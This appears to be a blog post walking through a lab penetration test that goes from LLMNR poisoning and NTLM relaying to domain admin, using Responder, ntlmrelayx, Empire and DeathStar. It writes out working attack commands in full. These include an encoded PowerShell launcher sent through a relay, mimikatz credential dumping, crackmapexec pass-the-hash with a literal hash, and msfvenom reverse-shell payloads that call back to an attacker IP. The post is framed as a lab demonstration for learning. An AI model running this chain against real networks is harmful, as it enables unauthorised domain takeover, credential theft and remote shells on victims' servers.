Automating the Pentesting Process: Using NTLM Relaying & Deathstar to get Domain Admin

What I’m using:

Responder

Empire

Deathstar

Ntlmrelayx.py (Install Guide here)

Operating Systems

Host: Ubuntu 16.04, Kali Linux (Latest)

Target 1: Windows Server 2008 R2 (Dummy server)

Target 2: Windows Server 2008 R2 (Domain Controller)

In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way while doing a penetration test. The problem is that NTLMv2 hashes cannot be passed (but regular NTLM can) and if your dictionary isn’t good or they enforce a strict password with numbers and special characters, you’ll be sitting with an NTLMv2 Hash and username and nothing to do. However, there is the option of relaying that username & hash. The nasty thing about this is NTLM Relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. What gets even worse is there’s a few tools that can automate the entire damn thing.

Now before I get started there’s a few things I’d like to clarify.

  1. I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali due to the python requests not wanting to negotiate any version of TLS less than 1.2.
  2. This first part of this process is assuming that NTLM relaying is possible, which if SMB signing is enabled, this entire operation is dead in the water. By default, it’s disabled, so that’s good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent on a machine by any ways possible, Deathstar will do its stuff. It doesn’t NEED NTLM relaying, this is just an interesting way of getting an Empire agent.
  3. I’m doing this on my lab network, not someone else’s. This demo is simulating what can happen if LLMNR spoofing is possible and a domain admin credentials are captured. This is a very limited demo of what Deathstar & Crackmapexec can do and I encourage you to read about it’s capabilities here.

Without further ado:

I first start up the RESTful API for Empire in one terminal.

sudo python empire --rest --username empireadmin --password Password123

Then I start up Deathstar in another.

sudo ./DeathStar.py --listener-ip 192.168.232.133 -t 100

ds1Listener IP will be whatever IP Empire is listening on. –t 100 means I’m giving it 100 threads to run, so it’s faster.

Next, I generate the powershell script from Empire. To do this, go to the listener module in Empire by typing in

Listeners

ds2

From here, I create the payload by using the command

launcher powershell Deathstar

ds3

Copy the powershell script as you’ll paste it in a minute.

Next, I set up ntlmrelayx.py (Guide to set up NTLMRelayx.py here)

sudo ntlmrelayx.py -t 192.168.232.100 -c 'powershell -noP -sta -w 1 -enc  [powershell code]’

ds4

ntlmrelayx.py also supports files with the –tf switch, so you can put in multiple targets if you wanted. Keep note that the powershell script must be in quotes or else it won’t run.

Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP

ds5

Finally, start up Responder

sudo python Responder.py -I ens33 -r -d –v

ds6

My screen then looks like this once it’s all set up.

ds7

Next, using my Windows machine, I simulate the domain admin mistyping a share, generating a LLMNR request.

ds8

Poisoned answer is then sent via Responder

ds9

NTLMv2 hashed credentials are relayed

ds10

Empire agent opened

ds11

Deathstar automatically starts doing its thing

ds12

Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.

ds13

An Empire agent is now running on the DC

ds14

The final step is to get a shell.

There’s many ways to do this

  1. Upload a meterpreter payload in the form of a .exe and execute it via the shell command
  2. Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
  3. Use Empire’s Invoke-Shellcode module
  4. Many more, research it.

 

Using Mimikatz & Crackmapexec to open Meterpreter Shell

First is to interact with the agent. Always use the agent with SYSTEM privileges. While user “god” is domain admin, SYSTEM is still a higher privilege.

interact [agent name]

ds15

Then run mimikatz

mimikatz

ds16

After a minute it’ll spit out a ton of info. Ignore it by pressing enter and then typing

creds

and a nice table is shown.

ds17

As you can see, it found the hashes and plain text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.

First set up multi/handlerds18

Then run crackmapexec. Even though I have the password in plain text, I’m demonstrating the hash here to show PTH is possible.

crackmapexec 192.168.232.100 -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST=192.168.232.136 LPORT=4443

ds19

ds20

ds21

Uploading a Meterpreter Payload via Empire

First, create a Meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.136 LPORT=4443 -f exe > shell.exe

ds22

Copy the .exe into the Empire directory

ds23

Interact with the agent in Empire

interact [Agent name]

Upload and execute the .exe

ds24

Grats on shell

ds25

There’s many many more ways to escalate from an agent to a shell, but these are two of the easiest, albeit uploading an executable is not the stealthiest and probably the least recommended, but a shell is a shell.

 

Extra Resources and credit for Deathstar & Crackmapexec:

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: